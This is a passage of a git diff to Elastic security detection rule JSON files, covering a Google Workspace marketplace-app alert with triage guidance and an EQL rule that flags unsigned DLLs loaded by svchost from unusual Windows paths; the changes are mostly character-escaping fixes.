environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json index f6e724863aa..1028fe7c6ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json +++ b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Added to Google Workspace Domain", - "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json index d170636c1d7..9904f137587 100644 --- a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json index d4fef92e4c8..abedf3c5a73 100644 --- a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json index 5b23fcfbadc..3037a955ded 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", "related_integrations": [ { "package": "endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json index 7d232fffdad..57df0c9b492 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time <= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n \"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n 